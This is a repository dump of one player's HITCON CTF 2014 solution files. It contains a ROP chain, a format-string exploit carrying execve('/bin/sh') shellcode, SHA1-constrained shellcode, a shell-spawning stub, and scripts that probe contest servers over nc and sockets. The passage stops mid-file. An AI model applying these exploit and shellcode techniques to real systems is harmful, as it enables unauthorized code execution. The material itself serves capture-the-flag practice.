├── README.md ├── rsbo-hack ├── rsbo-4a707e7d07e87ab97348be36efea28dc ├── callme-69d26b77eb41e4eeba1d7b8402a8b165 ├── gen_mid_test.rb ├── Makefile ├── callme_no_alarm.rb ├── polyglot.txt ├── ty_search.rb ├── sha1lcode_gen.rb ├── hop_trace.rb ├── ducky.c ├── rsbo.rb ├── ty.rb ├── tarmful.rb ├── ty.S ├── shell.c ├── callme.c ├── sha1lcode.rb ├── callme.rb ├── 24.rb ├── hop.cc ├── pneu.rb ├── mid.c ├── sha1_find.cc ├── rsbo_rop.txt ├── hop_graph.cc ├── rsbo2.txt ├── rsbo.txt ├── callme.txt └── de.txt /README.md: -------------------------------------------------------------------------------- 1 | My submission for HITCON CTF 2014. 2 | 3 | -------------------------------------------------------------------------------- /rsbo-hack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shinh/hitcon-ctf-2014/master/rsbo-hack -------------------------------------------------------------------------------- /rsbo-4a707e7d07e87ab97348be36efea28dc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shinh/hitcon-ctf-2014/master/rsbo-4a707e7d07e87ab97348be36efea28dc -------------------------------------------------------------------------------- /callme-69d26b77eb41e4eeba1d7b8402a8b165: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shinh/hitcon-ctf-2014/master/callme-69d26b77eb41e4eeba1d7b8402a8b165 -------------------------------------------------------------------------------- /gen_mid_test.rb: -------------------------------------------------------------------------------- 1 | # N = 99999 2 | # a = [] 3 | # N.times{ 4 | # a << rand(3) 5 | # } 6 | 7 | N = 99999 8 | a = [] 9 | N.times{ 10 | a << rand(2**63) - 2 ** 62 11 | } 12 | 13 | puts N 14 | puts a * ' ' 15 | puts 16 | puts '__INPUT__' 17 | puts a.sort[N/2] 18 | puts 19 | puts '__OUTPUT__' 20 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | all: hop hop_graph sha1_find 2 | 3 | hop: hop.cc 4 | $(CXX) -std=gnu++11 -o $@ $< -g -fPIC -pie 5 | 6 | hop_graph: hop_graph.cc 7 | $(CXX) -std=gnu++11 -o $@ $< -g -fPIC -pie -O2 8 | 9 | sha1_find: sha1_find.cc 10 | $(CXX) -std=gnu++11 -o $@ $< -g -fPIC -pie -O2 -lcrypto 11 | 12 | 13 | -------------------------------------------------------------------------------- /callme_no_alarm.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | # -*- coding: binary -*- 3 | 4 | c = File.open('callme-69d26b77eb41e4eeba1d7b8402a8b165', 'r:binary').read 5 | #STDERR.puts c[0x68f, 5].inspect 6 | c[0x71c,5] = "\x90" * 5 7 | c[0x73e,5] = "\x90" * 5 8 | File.open('callme-hack', 'w:binary') do |of| 9 | of.print(c) 10 | end 11 | system("chmod 755 callme-hack") 12 | -------------------------------------------------------------------------------- /polyglot.txt: -------------------------------------------------------------------------------- 1 | a=42//33;--a;''';/+%q( 2 | ;b=42//33;{- 3 | ; 4 | #include 5 | #include 6 | int main(){ 7 | char buf[999]; 8 | int fd = open("flag", O_RDONLY); 9 | int len = read(fd, buf, 999); 10 | write(1, buf, len); 11 | return 0; 12 | } 13 | /* 14 | 15 | -} 16 | (//)=(/) 17 | main = do 18 | str <- readFile "flag" 19 | putStr str 20 | {- 21 | 22 | ) 23 | BEGIN{ 24 | print File.read('flag') 25 | exit 26 | } 27 | %q( 28 | 29 | ''' 30 | import sys 31 | sys.stdout.write(open('flag').read()) 32 | ''' 33 | 34 | )#*///-}--''' 35 | -------------------------------------------------------------------------------- /ty_search.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # HITCON{HAve_FuN_4_NXTGen_P1at4|m} 4 | 5 | tmpl = File.read('ty.S') 6 | 7 | ans = '' 8 | 9 | 33.times{|i| 10 | u = 128 11 | l = 0 12 | 13 | while l + 1 != u 14 | c = (u + l) / 2 15 | puts "#{i}: #{l} #{c} #{u}" 16 | 17 | code = tmpl.sub(/#\d+\].*?\/\/ index/, "##{i}] // index") 18 | code = code.sub(/\d+\s+\/\/ value/, "#{c} // value") 19 | 20 | File.open('/tmp/ty.S', 'w') do |of| 21 | of.print(code) 22 | end 23 | 24 | if `ruby ty.rb /tmp/ty.S | nc 210.71.253.109 9123` =~ /qemu/ 25 | l = c 26 | else 27 | u = c 28 | end 29 | end 30 | ans += u.chr 31 | puts ans 32 | } 33 | -------------------------------------------------------------------------------- /sha1lcode_gen.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'digest' 4 | 5 | ('aaaaaaaa'..'zzzzzzzz').each do |s| 6 | s = s * 2 7 | dig = Digest::SHA1.hexdigest(s) 8 | #p dig 9 | #if dig !~ /^ffc0eb10/ 10 | #if dig !~ /^eb24/ 11 | #if dig !~ /^eb23/ 12 | #if dig !~ /0f05$/ 13 | if dig !~ /^0f05/ 14 | next 15 | end 16 | 17 | tmp = '/tmp/b' 18 | File.open(tmp, 'w') do |of| 19 | of.print dig.chars.each_slice(2).map{|c|c.join.hex.chr}.join 20 | end 21 | 22 | dump = `objdump -b binary -m i386:x86-64 -D #{tmp}` 23 | #if dump =~ /\(bad\)|\.byte|fwait|lahf|icebp|vminpd|call|ret/ 24 | # next 25 | #end 26 | 27 | puts "=== #{s} ===" 28 | puts dump 29 | end 30 | 31 | -------------------------------------------------------------------------------- /hop_trace.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | pipe = IO.popen(['gdb', 'hop'], 'r+') 4 | 5 | pipe.puts 'b hop.cc:78' 6 | #pipe.puts "run BITCON{01234567890123456789012345678901}" 7 | pipe.puts "run HITCON{01234567890123456789012345678901}" 8 | pipe.puts "p argv[1]" 9 | 10 | done = false 11 | while !done 12 | pipe.puts 'si' 13 | pipe.puts 'disas $rip,$rip+1' 14 | pipe.puts 'p $rax' 15 | pipe.puts 'p "marKer"' 16 | 17 | while l = pipe.gets 18 | if l =~ /marKer/ 19 | break 20 | end 21 | 22 | puts l 23 | 24 | if l =~ /printf/ 25 | pipe.puts 'cont' 26 | done = true 27 | break 28 | end 29 | end 30 | end 31 | 32 | pipe.close_write 33 | puts pipe.read 34 | 35 | -------------------------------------------------------------------------------- /ducky.c: -------------------------------------------------------------------------------- 1 | #include"linux/acct.h" 2 | #include"stdio.h" 3 | 4 | #undef HZ 5 | #define HZ 6 | 7 | int main AHZ 8 | 9 | #undef HZ 10 | #define HZ "/home/ducky/flag", 0 11 | 12 | #define struct 13 | #define utimbuf 14 | #define __kernel_time_t 15 | #define actime open AHZ 16 | #define modtime step2 AHZ 17 | 18 | #include"linux/utime.h" 19 | 20 | 21 | #undef HZ 22 | #define HZ 23 | int step2 AHZ 24 | 25 | #undef HZ 26 | #define HZ 3, stderr, 999 27 | 28 | #define actime read AHZ 29 | #define modtime step3 AHZ 30 | 31 | #undef _LINUX_UTIME_H 32 | #include"linux/utime.h" 33 | 34 | 35 | #undef HZ 36 | #define HZ 37 | int step3 AHZ 38 | 39 | #undef HZ 40 | #define HZ stderr 41 | 42 | #define actime puts AHZ 43 | #define modtime 44 | 45 | #undef _LINUX_UTIME_H 46 | #include"linux/utime.h" 47 | -------------------------------------------------------------------------------- /rsbo.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | #o = 'hoge' * (0x50 / 4) 4 | o = "\0" * 0x50 5 | 6 | #o << [0, 0].pack('L2') 7 | #o << 'fugafuga' 8 | #o << 'fugafuga' 9 | #o << [0xffffffff, 0xffffffff, 0xffffffff, 0xffffffff].pack('L4') 10 | o << [0, 0, 0, 0].pack('L4') 11 | 12 | data = 0x0804a040 13 | 14 | #o << [0, 0, 0x0804a040, 0xdead].pack('L4') 15 | o << [0, 0, 0x0804a040, 0x08048671].pack('L4') 16 | o << [0xdeadd, 0x0804a040, 255, 0xdead].pack('L4') 17 | #o << [0x0804a040, 0xdead, 0, 0].pack('L4') 18 | 19 | pop2_ret = 0x0804879e 20 | pop3_ret = 0x0804879d 21 | 22 | # Secondary payload 23 | o << [0].pack('L*') 24 | o << [0x08048420, pop2_ret, 0x80487d0, 0].pack('L*') # open 25 | o << [0x080483e0, pop3_ret, 3, data+200, 256].pack('L*') # read 26 | o << [0x08048450, pop3_ret, 1, data+200, 256].pack('L*') # write 27 | 28 | 29 | #o << [0, 0, 0, 0].pack('L4') 30 | 31 | #o << [0x0804865c].pack('L') 32 | 33 | print o 34 | 35 | -------------------------------------------------------------------------------- /ty.rb: -------------------------------------------------------------------------------- 1 | require 'socket' 2 | 3 | asm = ARGV[0] || 'ty.S' 4 | 5 | #out = TCPSocket.new('210.71.253.109', 9123) 6 | out = STDOUT 7 | 8 | system("LD_LIBRARY_PATH=/usr/lib/aarch64/usr/lib ./aarch64/usr/bin/aarch64-linux-gnu-as #{asm}") 9 | 10 | o = '' 11 | `aarch64-linux-gnu-objdump -S a.out`.each_line do |line| 12 | if line =~ /411[0-9a-f]{3}:\s+([0-9a-f]{8})/ 13 | o << [$1.hex].pack('V') 14 | end 15 | end 16 | 17 | while o.size < 220 18 | o << "\0" 19 | end 20 | 21 | out.print "#{o.size}" + "\0" * 5 22 | out.print o 23 | out.print "\0" * o.size 24 | 25 | if out != STDOUT 26 | out.close_write 27 | puts out.read 28 | end 29 | 30 | #puts 123 31 | #print ' ' * 123 32 | 33 | #puts 999 34 | 35 | # 1.upto(1000) do |i| 36 | # print i, " " 37 | # system("echo #{i} | aarch64/usr/bin/qemu-aarch64-static ./ty-b83f0d0edeb8cfad76d30eddc58da139 2>&1") 38 | # #pipe = IO.popen('aarch64/usr/bin/qemu-aarch64-static ./ty-b83f0d0edeb8cfad76d30eddc58da139 2>&1', 'r+') 39 | # #pipe.puts(i) 40 | # #pipe.close_write 41 | # #print i, " ", pipe.read 42 | # #puts 43 | # #STDOUT.flush 44 | # end 45 | -------------------------------------------------------------------------------- /tarmful.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | skipto = nil 4 | skipto = '496_solve' 5 | 6 | if skipto 7 | f = skipto 8 | else 9 | f = 'tarmful-3f13b82f7794de783adfd6fa9928ad2c.zip' 10 | 11 | system("rm -fr /tmp/work") 12 | system("mkdir -p /tmp/work") 13 | system("cp #{f} /tmp/work") 14 | end 15 | 16 | Dir.chdir("/tmp/work") 17 | 18 | while true 19 | type = `file #{f}` 20 | if f =~ /\.zip/ || type =~ /Zip archive/ 21 | o = `unzip #{f}` 22 | puts o 23 | 24 | f = o[/(extracting|inflating): (.*)/, 2].strip 25 | 26 | #f = o[/extracting: (.*\.zip)/, 1] 27 | #if !f 28 | # f = o[/inflating: (.*\.tar\.(bz2|gz))/, 1] 29 | #end 30 | elsif f =~ /\.tar\..*/ || type =~ /bzip2|gzip/ 31 | pipe = IO.popen(['tar', '-xvf', f]) 32 | o = pipe.read 33 | pipe.close 34 | puts o 35 | 36 | #f = o[/^\d+\/\d+\.(tar\.|zip).*/] 37 | f = o[/^.*\Z/] 38 | 39 | f.gsub!(/\\\\/, '\\') 40 | else 41 | raise "Unknown file type #{f}" 42 | end 43 | 44 | n = f.tr("/\\: `'\"()<>", '___________') 45 | n.gsub!(/\W/, '_') 46 | n.gsub!(/\\/, '_') 47 | n.sub!(/;.*/, '') 48 | 49 | puts "#{f} => #{n}" 50 | File.rename(f, n) 51 | f = n 52 | 53 | if !File.exist?(f) 54 | raise f 55 | end 56 | end 57 | -------------------------------------------------------------------------------- /ty.S: -------------------------------------------------------------------------------- 1 | .org 0x400590 2 | exit: 3 | .org 0x4005a0 4 | open: 5 | .org 0x4005e0 6 | puts: 7 | .org 0x400610 8 | read: 9 | 10 | .org 0x411468 11 | adrp x0, 411000 12 | add x0, x0, #filename - 0x411000 13 | mov x1, #0 14 | bl open 15 | cmp w0, #-1 16 | b.ne cont 17 | ret 18 | cont: 19 | mov x2, #99 20 | adrp x1, 411000 21 | add x1, x1, #hello - 0x411000 22 | bl read 23 | 24 | adrp x0, 411000 25 | add x0, x0, #hello - 0x411000 26 | bl puts 27 | 28 | adrp x1, 411000 29 | add x1, x1, #hello - 0x411000 30 | 31 | ldrb w2, [x1, #0] // index 32 | cmp x2, 50 // value 33 | 34 | b.hi hello 35 | 36 | bl exit 37 | filename: 38 | .string "/home/ty/flag" 39 | .byte 0, 0, 0, 0, 0, 0 40 | hello: 41 | .string "hell" 42 | .byte 0, 0, 0, 0 43 | .byte 0, 0, 0, 0 44 | .byte 0, 0, 0, 0 45 | .byte 0, 0, 0, 0 46 | .byte 0, 0, 0, 0 47 | .byte 0, 0, 0, 0 48 | .byte 0, 0, 0, 0 49 | .byte 0, 0, 0, 0 50 | .byte 0, 0, 0, 0 51 | .byte 0, 0, 0, 0 52 | .byte 0, 0, 0, 0 53 | .byte 0, 0, 0, 0 54 | .byte 1,1,1,1 55 | -------------------------------------------------------------------------------- /shell.c: -------------------------------------------------------------------------------- 1 | char buf[99999]; 2 | 3 | int main() { 4 | const char* args[] = { "/bin/sh", 0 }; 5 | asm("mov %0, %%rax\n" 6 | 7 | "mov %%rax, %%rsi\n" 8 | 9 | "mov %%rax, %%rdx\n" 10 | "inc %%rdx\n" 11 | "inc %%rdx\n" 12 | "inc %%rdx\n" 13 | "inc %%rdx\n" 14 | "inc %%rdx\n" 15 | "inc %%rdx\n" 16 | "inc %%rdx\n" 17 | "inc %%rdx\n" 18 | "inc %%rdx\n" 19 | "inc %%rdx\n" 20 | "inc %%rdx\n" 21 | "inc %%rdx\n" 22 | "inc %%rdx\n" 23 | "inc %%rdx\n" 24 | "inc %%rdx\n" 25 | "inc %%rdx\n" 26 | "mov %%rdx, (%%rax)\n" 27 | 28 | "add $8, %%rax\n" 29 | "xor %%rdx, %%rdx\n" 30 | "mov %%rdx, (%%rax)\n" 31 | 32 | "add $8, %%rax\n" 33 | "mov %%rax, %%rdi\n" 34 | 35 | "movb $47, (%%rax)\n" 36 | "inc %%rax\n" 37 | 38 | "movb $98, (%%rax)\n" 39 | "inc %%rax\n" 40 | 41 | "movb $105, (%%rax)\n" 42 | "inc %%rax\n" 43 | 44 | "movb $110, (%%rax)\n" 45 | "inc %%rax\n" 46 | 47 | "movb $47, (%%rax)\n" 48 | "inc %%rax\n" 49 | 50 | "movb $115, (%%rax)\n" 51 | "inc %%rax\n" 52 | 53 | "movb $104, (%%rax)\n" 54 | "inc %%rax\n" 55 | 56 | "movb $0, (%%rax)\n" 57 | "inc %%rax\n" 58 | 59 | //"mov (%1), %%rdi\n" 60 | //"mov %1, %%rsi\n" 61 | "mov %%rsi, %%rdx\n" 62 | 63 | "xor %%rax, %%rax\n" 64 | "mov $59, %%rax\n" 65 | "syscall\n" 66 | ::"r"(buf), "r"(args) 67 | :"%rax", "%rdi", "%rsi", "%rdx"); 68 | } 69 | -------------------------------------------------------------------------------- /callme.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | char g_buf[0x400]; 5 | time_t g_ptim; 6 | 7 | void read_line(char* b, int n); 8 | void print(char* b); 9 | 10 | void show_msg(const char* time_str, const char* fmt) { 11 | char buf[0xb0]; 12 | sprintf(buf, fmt, time_str, g_buf); 13 | print(buf); 14 | } 15 | 16 | void show() { 17 | char tmfmt[] = " %2$s\n\0\0%s%s\n\0\0\0\0\0\0\0\0\0\0\0"; 18 | time_t tim; 19 | struct tm* tm; 20 | char buf[80]; 21 | 22 | time(&tim); 23 | tm = localtime(&tim); 24 | strftime(buf, 80, "%H:%M:%S ", tm); 25 | 26 | if (g_ptim != tim) { 27 | g_ptim = tim; 28 | show_msg(buf, tmfmt + 16); 29 | } else { 30 | show_msg(buf, tmfmt); 31 | } 32 | } 33 | 34 | void record_msg() { 35 | for (;;) { 36 | read_line(g_buf, 0x400); 37 | if (g_buf[0] == 'E' && g_buf[1] == 'N' && g_buf[2] == 'D' && !g_buf[3]) { 38 | return; 39 | } 40 | show(); 41 | } 42 | } 43 | 44 | int main() { 45 | int i; 46 | char buf[4]; 47 | 48 | alarm(30); 49 | for (i = 0; i < 3; i++) { 50 | print("."); 51 | sleep(1); 52 | } 53 | 54 | print("Sorry, we are not able to take your call right now.\n"); 55 | print("Do you want to leave a message (y/n)? "); 56 | 57 | read_line(buf, 4); 58 | if (buf[0] != 'y') { 59 | print("Bye!\n"); 60 | } else { 61 | record_msg(); 62 | } 63 | } 64 | 65 | void read_line(char* b, int n) { 66 | for (; --n; b++) { 67 | *b = getchar(); 68 | if (*b == '\n') { 69 | break; 70 | } 71 | } 72 | *b = 0; 73 | } 74 | 75 | void print(char* b) { 76 | for (; *b; b++) { 77 | putchar(*b); 78 | fflush(stdout); 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /sha1lcode.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | mov_rcx_rax = '0000000005956924' 4 | mov_rax_rsi = '0000000019221105' 5 | mov_rax_rdx = '0000000012851142' 6 | inc_rdx = '0000000008277163' 7 | mov_rdx_mrax = '0000000062517457' 8 | xor_rdx_rdx = '0000000012024928' 9 | mov_rax_rdi = '0000000039570129' 10 | movb_2f_mrax = '0000000068497096' 11 | inc_rax = '0000000021765295' 12 | movb_62_mrax = '0000000000137407' 13 | movb_69_mrax = '0000000024172868' 14 | movb_6e_mrax = '0000000024188522' 15 | movb_2f_mrax = '0000000068497096' 16 | movb_73_mrax = '0000000006453988' 17 | movb_68_mrax = '0000000004867185' 18 | movb_00_mrax = '0000000020736806' 19 | mov_rsi_rdx = '0000000003456370' 20 | xor_rax_rax = '0000000011556553' 21 | 22 | $jmp_3 = 'aaaafqcuaaaafqcu' 23 | $jmp_2 = 'aaaaeakuaaaaeaku' 24 | #xor_eax = 'aaaabbwpaaaabbwp' 25 | #inc_eax = 'aaaahtnnaaaahtnn' 26 | 27 | syscall = 'aaaacklnaaaackln' 28 | 29 | $o = '' 30 | 31 | def out(a) 32 | $o += $jmp_3 33 | $o += a 34 | end 35 | 36 | out(mov_rax_rsi) 37 | out(mov_rax_rdx) 38 | 16.times{out(inc_rdx)} 39 | out(mov_rdx_mrax) 40 | 41 | 8.times{out(inc_rax)} 42 | out(xor_rdx_rdx) 43 | out(mov_rdx_mrax) 44 | 45 | 8.times{out(inc_rax)} 46 | out(mov_rax_rdi) 47 | 48 | [movb_2f_mrax, 49 | movb_62_mrax, 50 | movb_69_mrax, 51 | movb_6e_mrax, 52 | movb_2f_mrax, 53 | movb_73_mrax, 54 | movb_68_mrax, 55 | movb_00_mrax].each{|a| 56 | out(a) 57 | out(inc_rax) 58 | } 59 | 60 | out(mov_rsi_rdx) 61 | out(xor_rax_rax) 62 | 59.times{out(inc_rax)} 63 | 64 | $o += syscall 65 | 66 | #print $o 67 | 68 | print [$o.size / 16].pack("L*") 69 | print $o 70 | 71 | puts 'cat /home/sha1lcode/flag' 72 | #print 'a' * 1000000 73 | 74 | 75 | # pipe = IO.popen('./sha1lcode-5b43cc13b0fb249726e0ae175dbef3fe', 'r+') 76 | 77 | # while l = gets 78 | # pipe.puts l 79 | # puts pipe.gets 80 | # end 81 | -------------------------------------------------------------------------------- /callme.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | shell = %Q( 4 | 80483ea: 89 d0 mov %edx,%eax 5 | 80483ec: 89 c1 mov %eax,%ecx 6 | 80483ee: 89 c2 mov %eax,%edx 7 | 80483f0: 83 c2 08 add $0x8,%edx 8 | 80483f3: 89 10 mov %edx,(%eax) 9 | 80483f5: 83 c0 04 add $0x4,%eax 10 | 80483f8: 31 d2 xor %edx,%edx 11 | 80483fa: 89 10 mov %edx,(%eax) 12 | 80483fc: 83 c0 04 add $0x4,%eax 13 | 80483ff: 89 c3 mov %eax,%ebx 14 | 8048401: 89 c2 mov %eax,%edx 15 | 8048403: c6 02 2f movb $0x2f,(%edx) 16 | 8048406: 42 inc %edx 17 | 8048407: c6 02 62 movb $0x62,(%edx) 18 | 804840a: 42 inc %edx 19 | 804840b: c6 02 69 movb $0x69,(%edx) 20 | 804840e: 42 inc %edx 21 | 804840f: c6 02 6e movb $0x6e,(%edx) 22 | 8048412: 42 inc %edx 23 | 8048413: c6 02 2f movb $0x2f,(%edx) 24 | 8048416: 42 inc %edx 25 | 8048417: c6 02 73 movb $0x73,(%edx) 26 | 804841a: 42 inc %edx 27 | 804841b: c6 02 68 movb $0x68,(%edx) 28 | 804841e: 42 inc %edx 29 | 804841f: 31 c0 xor %eax,%eax 30 | 8048421: 88 02 mov %al,(%edx) 31 | 8048423: 89 ca mov %ecx,%edx 32 | 8048425: b0 0b mov $0xb,%al 33 | 8048427: cd 80 int $0x80 34 | ) 35 | 36 | shell.gsub!(/ \w+:\s+/, '') 37 | shell.strip! 38 | shell.gsub!(/ .*/, '') 39 | 40 | code = shell.split.map{|b|b.hex.chr} * '' 41 | 42 | puts 'y' 43 | 44 | msg = "aaa" 45 | 46 | #msg += [0x804a018].pack('L') 47 | 48 | #msg += [0x804a018, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x804a019].pack('L') 49 | 50 | msg += [0x804a019, 0x11111111, 0x804a018].pack('L*') 51 | 52 | #"\1\1\1\1" 53 | 54 | while msg.size != 0xaa - 0x60 55 | msg += 'a' 56 | end 57 | 58 | msg += code 59 | 60 | while msg.size != 187 61 | msg += 'b' 62 | end 63 | 64 | #msg += '%09d' * 10 + ' %d' 65 | 66 | msg += '%08u' + '%04hhu' * 8 + '%0104hhu' + '%hhn' + '%010hhu' + '%hhn' 67 | 68 | #msg += '%08u' + '%04hhu' * 8 + '%0115hhu' + '%hhn' + ' %d' 69 | 70 | #msg += '%08u' + '%04hhu' * 9 + ' %d' 71 | 72 | #msg += '%08d %08d %d %d %d %d %d %d %d %d %d ' 73 | 74 | #msg += '%7$d %d %d %d %d %d %d %d %d %d %d ' 75 | 76 | 77 | puts msg 78 | 79 | puts 'cat /home/callme/flag' 80 | 81 | #puts 'a' * 267 82 | 83 | #puts 'a' * 267 + '%x' 84 | 85 | 86 | -------------------------------------------------------------------------------- /24.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'socket' 4 | 5 | class Float 6 | def to_i 7 | self.floor 8 | end 9 | end 10 | 11 | def solve_impl(a) 12 | if a.size == 1 13 | #if `python -c 'print abs(eval("#{a[0][1]}") - 24) >= 1e-15'` =~ /False/ 14 | # raise a[0][1] 15 | #end 16 | if (a[0][0] - 24.0).abs < 1e-15 17 | raise a[0][1] 18 | elsif (a[0][0] + 24.0).abs < 1e-15 19 | raise "-(#{a[0][1]})" 20 | end 21 | return 22 | end 23 | 24 | a.size.times{|i| 25 | i.times{|j| 26 | n = a[0,j] + a[j+1..i-1] + a[i+1..-1] 27 | solve_impl(n + [[a[j][0] + a[i][0], "(#{a[j][1]}+#{a[i][1]})"]]) 28 | solve_impl(n + [[a[j][0] - a[i][0], "(#{a[j][1]}-#{a[i][1]})"]]) 29 | solve_impl(n + [[a[i][0] - a[j][0], "(#{a[i][1]}-#{a[j][1]})"]]) 30 | solve_impl(n + [[a[j][0] * a[i][0], "(#{a[j][1]}*#{a[i][1]})"]]) 31 | solve_impl(n + [[a[j][0] * -a[i][0], "(#{a[j][1]}*-#{a[i][1]})"]]) 32 | solve_impl(n + [[a[j][0] ** a[i][0], "(#{a[j][1]}**#{a[i][1]})"]]) 33 | solve_impl(n + [[a[i][0] ** a[j][0], "(#{a[i][1]}**#{a[j][1]})"]]) 34 | solve_impl(n + [[a[j][0] ** -a[i][0], "(#{a[j][1]}**-#{a[i][1]})"]]) 35 | solve_impl(n + [[a[i][0] ** -a[j][0], "(#{a[i][1]}**-#{a[j][1]})"]]) 36 | if a[i][0] != 0 37 | solve_impl(n + [[a[j][0] / a[i][0], "(#{a[j][1]}/#{a[i][1]})"]]) 38 | solve_impl(n + [[a[j][0] / -a[i][0], "(#{a[j][1]}/-#{a[i][1]})"]]) 39 | solve_impl(n + [[a[i][0] / a[j][0], "(#{a[i][1]}/#{a[j][1]})"]]) 40 | solve_impl(n + [[a[i][0] / -a[j][0], "(#{a[i][1]}/-#{a[j][1]})"]]) 41 | if a[i][0] != Float::INFINITY && a[j][0] != Float::INFINITY 42 | if a[i][0].to_i != 0 43 | solve_impl(n + [[(a[j][0] / a[i][0]).to_i.to_f, 44 | "(#{a[j][1]}//#{a[i][1]})"]]) 45 | solve_impl(n + [[(a[j][0] / -a[i][0]).to_i.to_f, 46 | "(#{a[j][1]}//-#{a[i][1]})"]]) 47 | end 48 | if a[j][0].to_i != 0 49 | solve_impl(n + [[(a[i][0] / a[j][0]).to_i.to_f, 50 | "(#{a[i][1]}//#{a[j][1]})"]]) 51 | solve_impl(n + [[(a[i][0] / -a[j][0]).to_i.to_f, 52 | "(#{a[i][1]}//-#{a[j][1]})"]]) 53 | end 54 | end 55 | end 56 | } 57 | } 58 | end 59 | 60 | 61 | #solve_impl([8, 6, 11, 12].map{|v|[v.to_f, v.to_s]}) 62 | #solve_impl([13, 13, 4, 1].map{|v|[v.to_f, v.to_s]}) 63 | #exit 64 | 65 | def solve(a) 66 | begin 67 | solve_impl(a) 68 | puts 'no anser...' 69 | rescue 70 | return $! 71 | end 72 | return '13//13**(-1/4)' 73 | end 74 | 75 | s = TCPSocket.new('210.65.89.59', 2424) 76 | 77 | while l = s.gets 78 | puts l 79 | if l =~ /Question .*?: (\[.*?\])/ 80 | q = eval($1) 81 | a = solve(q.map{|v|[v.to_f, v.to_s]}) 82 | puts a 83 | s.puts("#{a}") 84 | end 85 | end 86 | 87 | #q = [13, 9, 9, 3] 88 | # q = [9, 7, 8, 2] 89 | # # 9 7 8 2 90 | # solve(q.map{|v|[v.to_f, v.to_s]}) 91 | -------------------------------------------------------------------------------- /hop.cc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | typedef unsigned char byte; 9 | 10 | const char* HOP = "hop-62fa7ade9a1fa9254361e69d70e7a7e3.exe"; 11 | 12 | /* 13 | 0 .text 002c6510 0000000000401000 0000000000401000 00000400 2**4 14 | CONTENTS, ALLOC, LOAD, READONLY, CODE 15 | 1 .data 000000a0 00000000006c8000 00000000006c8000 002c6a00 2**4 16 | CONTENTS, ALLOC, LOAD, DATA 17 | 2 .rdata 00000998 00000000006c9000 00000000006c9000 002c6c00 2**4 18 | CONTENTS, ALLOC, LOAD, READONLY, DATA 19 | 3 .pdata 00000234 00000000006ca000 00000000006ca000 002c7600 2**2 20 | CONTENTS, ALLOC, LOAD, READONLY, DATA 21 | 4 .xdata 00000200 00000000006cb000 00000000006cb000 002c7a00 2**2 22 | CONTENTS, ALLOC, LOAD, READONLY, DATA 23 | 5 .bss 00000a00 00000000006cc000 00000000006cc000 00000000 2**5 24 | ALLOC 25 | 6 .idata 00000800 00000000006cd000 00000000006cd000 002c7c00 2**2 26 | CONTENTS, ALLOC, LOAD, DATA 27 | 7 .CRT 00000068 00000000006ce000 00000000006ce000 002c8400 2**3 28 | CONTENTS, ALLOC, LOAD, DATA 29 | 8 .tls 00000068 00000000006cf000 00000000006cf000 002c8600 2**5 30 | CONTENTS, ALLOC, LOAD, DATA 31 | */ 32 | 33 | struct Section { 34 | size_t size; 35 | size_t vma; 36 | size_t off; 37 | }; 38 | 39 | Section sections[] = { 40 | { 0x2c6510, 0x401000, 0x400 }, 41 | #if 0 42 | { 0xa0, 0x6c8000, 0x2c6a00 }, 43 | { 0x2c6510, 0x401000, 0x2c }, 44 | { 0x2c6510, 0x401000, 0x400 }, 45 | #endif 46 | { 0, 0, 0 } 47 | }; 48 | 49 | size_t roundup(size_t s) { 50 | return (s + 4095) & ~4095; 51 | } 52 | 53 | int main(int argc, char* argv[]) { 54 | const char* flag = "HITCON{01234567890123456789012345678901}"; 55 | if (argv[1]) 56 | flag = argv[1]; 57 | int fd = open(HOP, O_RDONLY); 58 | 59 | for (int i = 0; sections[i].size; i++) { 60 | Section sec = sections[i]; 61 | void* r = mmap((void*)sec.vma, roundup(sec.size), 62 | PROT_READ | PROT_WRITE | PROT_EXEC, 63 | MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, -1, 0); 64 | assert(r != MAP_FAILED); 65 | 66 | lseek(fd, sec.off, SEEK_SET); 67 | read(fd, (void*)sec.vma, sec.size); 68 | } 69 | 70 | byte* check_func_ms = (byte*)0x401590; 71 | // mov RCX, RDI (MS => GCC ABI) 72 | check_func_ms[-3] = 0x48; 73 | check_func_ms[-2] = 0x89; 74 | check_func_ms[-1] = 0xf9; 75 | 76 | int (*check_func)(const char*); 77 | check_func = (typeof(check_func))(check_func_ms - 3); 78 | //check_func("HITCON{SO0O0OO_MaNy_7Ar_Le\\/eLs}"); 79 | //check_func("HITCON{0123456789012345678901}"); 80 | //int r = check_func("HITCON{01234567890123456789012345678901}"); 81 | int r = check_func(flag); 82 | printf("%d\n", r); 83 | } 84 | -------------------------------------------------------------------------------- /pneu.rb: -------------------------------------------------------------------------------- 1 | pneu = File.read('Pneumotoulthamicrescopicfilicoloaganiconissis-df5bb3d8f83d6d37e16560062cb231bc.txt') 2 | 3 | pneu[0] = 'm' 4 | 5 | pneu.sub!('H', 'i') 6 | pneu.sub!('I', 'y') 7 | pneu.sub!('T', 'e') 8 | pneu.sub!('C', 'r') 9 | pneu.sub!('O', 'l') 10 | pneu.sub!('N', 'y') 11 | pneu.sub!('{', 'l') 12 | pneu.sub!('T', 'g') 13 | 14 | [ 15 | ['h', 14037, 't'], 16 | ['i', 15553, 'a'], 17 | # 18 | [' ', 18778, 'y'], 19 | # f 20 | ['l', 21917, 'r'], 21 | ['a', 23566, 's'], 22 | ['g', 25089, 'l'], 23 | [' ', 26650, 'l'], 